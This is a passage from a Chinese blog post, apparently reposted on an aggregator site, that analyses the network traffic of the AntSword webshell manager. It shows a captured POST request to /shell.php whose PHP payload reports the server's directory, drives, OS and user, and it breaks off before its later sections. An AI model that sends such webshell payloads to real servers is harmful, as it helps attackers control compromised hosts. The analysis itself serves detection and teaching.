中国蚁剑流量分析

您所在的位置:网站首页 中国蚁剑 中国蚁剑流量分析

中国蚁剑流量分析

2023-09-29 03:50| 来源: 网络整理| 查看: 265

中国蚁剑流量分析

文章目录 中国蚁剑流量分析1.代理2.测试连接数据包:执行代码:执行结果: 3.双击连接第一个数据包数据包: 第二个数据包数据包:执行代码:response: 4.打开文件夹数据包: 5.打开文件数据包:执行代码: 6.修改文件1.修改小文件数据包:执行代码: 2.修改大文件 7.wget文件数据包执行代码: 8.删除文件数据包:执行代码: 9.上传文件1.数据包:执行代码: 10.打开终端数据包执行代码 模块源码部分知识点1.测试连接部分2.删除文件3.命令执行 防火墙绕过

1.代理

蚁剑有设置代理的功能,所以可以直接bp抓包,比wireshark抓包方便一点。 设置代理 之后bp开启截断即可。

2.测试连接

分析一下测试数据包。

请添加图片描述

这里为了方便代码的分析我选择了default传输,直接可以看到代码,不需要编码解码。

但是实际连站的时候还是要加编码方式,要不然可能连不上。

下面这个是bp拦截到的数据包(数据包的数据是url编码过的,我解码提取出来的)

数据包: POST /shell.php HTTP/1.1 Host: 192.168.47.209:80 Accept-Encoding: gzip, deflate User-Agent: antSword/v2.1 Content-Type: application/x-www-form-urlencoded Content-Length: 989 Connection: close cmd=@ini_set("display_errors", "0");@set_time_limit(0);function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "566a7";echo @asenc($output);echo "1d9d89261";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die(); 执行代码:

最后执行的代码其实相当于:



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3